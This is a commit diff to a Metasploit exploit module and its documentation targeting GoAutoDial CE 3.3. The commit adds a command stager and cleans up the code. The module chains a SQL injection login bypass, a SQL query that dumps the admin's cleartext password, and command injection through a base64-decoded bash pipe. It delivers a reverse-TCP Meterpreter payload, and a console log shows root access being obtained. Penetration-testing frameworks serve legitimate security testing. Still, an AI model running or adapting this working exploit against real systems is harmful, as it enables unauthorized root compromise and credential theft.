Add command stager and code cleanup
parent
b3be89b508
commit
8e2ff7a4c5
|
@ -1,52 +1,51 @@
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database.
|
This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database.
|
||||||
|
|
||||||
## Affected software
|
## Affected software
|
||||||
|
|
||||||
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
|
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
|
||||||
Refer to: https://www.exploit-db.com/exploits/36807/
|
Refer to: https://www.exploit-db.com/exploits/36807/
|
||||||
|
|
||||||
## Verification
|
## Verification
|
||||||
List the steps needed to make sure this thing works
|
|
||||||
|
|
||||||
- Start `msfconsole`
|
- Start `msfconsole`
|
||||||
- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
|
- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
|
||||||
- Do `set payload cmd/unix/reverse_bash`
|
|
||||||
- Do `set RHOST <IP>`
|
- Do `set RHOST <IP>`
|
||||||
- Do `set LHOST <IP>`
|
- Do `set LHOST <IP>`
|
||||||
- Do `set LPORT <PORT>`
|
- Do `set LPORT <PORT>`
|
||||||
|
- Do `run`
|
||||||
- Wait for shell
|
- Wait for shell
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
|
msf > use exploit/linux/http/goautodial_3_rce_command_injection
|
||||||
|
msf exploit(goautodial_3_rce_command_injection) > set rhost 172.16.191.150
|
||||||
|
rhost => 172.16.191.150
|
||||||
msf exploit(goautodial_3_rce_command_injection) > check
|
msf exploit(goautodial_3_rce_command_injection) > check
|
||||||
[+] 192.168.0.76:443 The target is vulnerable.
|
[+] 172.16.191.150:443 The target is vulnerable.
|
||||||
msf exploit(goautodial_3_rce_command_injection) > exploit -z
|
msf exploit(goautodial_3_rce_command_injection) > set lhost 172.16.191.181
|
||||||
|
lhost => 172.16.191.181
|
||||||
|
msf exploit(goautodial_3_rce_command_injection) > run
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 192.168.0.11:4444
|
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||||
[*] 192.168.0.76:443 - Trying SQL injection...
|
[*] 172.16.191.150:443 - Trying SQL injection...
|
||||||
[+] Authentication Bypass (SQLi) was successful
|
[+] 172.16.191.150:443 - Authentication Bypass (SQLi) was successful
|
||||||
[*] 192.168.0.76:443 - Dumping admin password...
|
[*] 172.16.191.150:443 - Dumping admin password...
|
||||||
[+] admin|goautodial|Admin|||Y
|
[+] 172.16.191.150:443 - Found credentials: admin|goautodial|Admin|||Y
|
||||||
[*] 192.168.0.76:443 - Sending payload...waiting for connection
|
[*] 172.16.191.150:443 - Sending payload...
|
||||||
[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000
|
[*] Command Stager progress - 68.67% done (798/1162 bytes)
|
||||||
[*] Session 7 created in the background.
|
[*] Sending stage (2854264 bytes) to 172.16.191.150
|
||||||
msf exploit(goautodial_3_rce_command_injection) > sessions -u 7
|
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.150:52876) at 2017-07-02 11:08:02 -0400
|
||||||
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7]
|
[*] Command Stager progress - 100.00% done (1162/1162 bytes)
|
||||||
|
|
||||||
[*] Upgrading session ID: 7
|
|
||||||
[*] Starting exploit/multi/handler
|
|
||||||
[*] Started reverse TCP handler on 192.168.0.11:4433
|
|
||||||
[*] Starting the payload handler...
|
|
||||||
[*] Sending stage (797784 bytes) to 192.168.0.76
|
|
||||||
[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
|
|
||||||
[*] Command stager progress: 100.00% (668/668 bytes)
|
|
||||||
msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
|
|
||||||
[*] Starting interaction with 8...
|
|
||||||
|
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: uid=0, gid=0, euid=0, egid=0
|
Server username: uid=0, gid=0, euid=0, egid=0
|
||||||
meterpreter > sysinfo
|
meterpreter > sysinfo
|
||||||
Computer : test
|
Computer : go.goautodial.org
|
||||||
OS : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
|
OS : CentOS 5.11 (Linux 2.6.18-407.el5)
|
||||||
Architecture : x64
|
Architecture : x64
|
||||||
Meterpreter : x86/linux
|
Meterpreter : x64/linux
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
|
@ -7,12 +7,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "GoAutoDial 3.3 Authentication Bypass / Command Injection",
|
'Name' => 'GoAutoDial 3.3 Authentication Bypass / Command Injection',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
|
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges.
|
||||||
|
|
||||||
|
This module has been tested successfully on GoAutoDial version 3.3-1406088000.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -24,12 +27,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
['CVE', '2015-2843'],
|
['CVE', '2015-2843'],
|
||||||
['CVE', '2015-2845']
|
['CVE', '2015-2845']
|
||||||
],
|
],
|
||||||
'Platform' => %w{unix},
|
'Platform' => 'linux',
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||||
'Targets' => [ ['Automatic', {} ] ],
|
'Targets' => [ ['Automatic', {} ] ],
|
||||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
|
||||||
|
'CMDSTAGER::FLAVOR' => 'echo'
|
||||||
|
},
|
||||||
|
'CmdStagerFlavor' => %w{ echo printf wget },
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'Privileged' => false,
|
'Privileged' => true,
|
||||||
'DisclosureDate' => 'Apr 21 2015'))
|
'DisclosureDate' => 'Apr 21 2015'))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
@ -42,19 +50,28 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def check
|
def check
|
||||||
res = check_version()
|
res = check_version
|
||||||
if res and res.body =~ /1421902800/
|
|
||||||
return Exploit::CheckCode::Safe
|
unless res
|
||||||
else
|
vprint_status "#{peer} Connection failed"
|
||||||
return Exploit::CheckCode::Vulnerable
|
return CheckCode::Unknown
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_version()
|
unless res.code == 200 && res.body =~ /goautodial/
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.body =~ /1421902800/
|
||||||
|
return CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
|
||||||
|
CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_version
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
|
||||||
'uri' => normalize_uri(uri, 'changelog.txt'),
|
'uri' => normalize_uri(uri, 'changelog.txt'),
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'User-Agent' => 'Mozilla/5.0',
|
'User-Agent' => 'Mozilla/5.0',
|
||||||
|
@ -63,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
def sqli_auth_bypass()
|
def sqli_auth_bypass
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
|
@ -75,67 +92,72 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
'user_name' => 'admin',
|
'user_name' => 'admin',
|
||||||
'user_pass' => '\'%20or%20\'1\'%3D\'1'
|
'user_pass' => "' or '"
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
def sqli_admin_pass(cookies)
|
def sqli_admin_pass
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', Rex::Text.uri_encode("' OR active='Y")),
|
||||||
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
|
'cookie' => @cookie,
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'User-Agent' => 'Mozilla/5.0',
|
'User-Agent' => 'Mozilla/5.0',
|
||||||
'Accept-Encoding' => 'identity',
|
'Accept-Encoding' => 'identity'
|
||||||
'Cookie' => cookies
|
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Run the actual exploit
|
# Run the command stager
|
||||||
#
|
#
|
||||||
def execute_command()
|
def execute_command(cmd, opts = {})
|
||||||
|
|
||||||
encoded = Rex::Text.encode_base64("#{payload.encoded}")
|
params = "|echo -n #{Rex::Text.encode_base64(cmd)} |base64 --decode|bash"
|
||||||
params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
|
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', Rex::Text.uri_encode(params)),
|
||||||
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
|
'cookie' => @cookie,
|
||||||
'headers' => {
|
'headers' => {
|
||||||
'User-Agent' => 'Mozilla/5.0',
|
'User-Agent' => 'Mozilla/5.0',
|
||||||
'Accept-Encoding' => 'identity',
|
'Accept-Encoding' => 'identity'
|
||||||
'Cookie' => @cookie
|
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
print_status("#{peer} - Trying SQL injection...")
|
||||||
|
res = sqli_auth_bypass
|
||||||
|
|
||||||
def exploit()
|
unless res
|
||||||
print_status("#{rhost}:#{rport} - Trying SQL injection...")
|
fail_with(Failure::Unknown, 'Connection failed')
|
||||||
res1 = sqli_auth_bypass()
|
end
|
||||||
|
|
||||||
if res1 && res1.code == 200
|
if res.code == 200 && res.get_cookies.include?('go_session')
|
||||||
print_good('Authentication Bypass (SQLi) was successful')
|
print_good("#{peer} - Authentication Bypass (SQLi) was successful")
|
||||||
else
|
else
|
||||||
print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
|
fail_with(Failure::NotVulnerable, "Run 'check' command to identify whether the auth bypass has been fixed")
|
||||||
end
|
end
|
||||||
|
|
||||||
@cookie = res1.get_cookies
|
@cookie = res.get_cookies
|
||||||
print_status("#{rhost}:#{rport} - Dumping admin password...")
|
print_status("#{peer} - Dumping admin password...")
|
||||||
res = sqli_admin_pass(@cookie)
|
res = sqli_admin_pass
|
||||||
|
|
||||||
if res
|
unless res
|
||||||
print_good(res.body)
|
fail_with(Failure::Unknown, 'Connection failed')
|
||||||
|
end
|
||||||
|
|
||||||
|
# Example response: admin|goautodial|Admin|||Y
|
||||||
|
if res.body.include?('|')
|
||||||
|
print_good("#{peer} - Found credentials: #{res.body}")
|
||||||
else
|
else
|
||||||
print_error('Error: No creds returned, possible mitigations are in place.')
|
fail_with(Failure::NotVulnerable, 'No creds returned, possible mitigations are in place.')
|
||||||
end
|
end
|
||||||
print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
|
|
||||||
|
|
||||||
execute_command()
|
print_status("#{peer} - Sending payload...")
|
||||||
|
execute_cmdstager(:linemax => 800)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue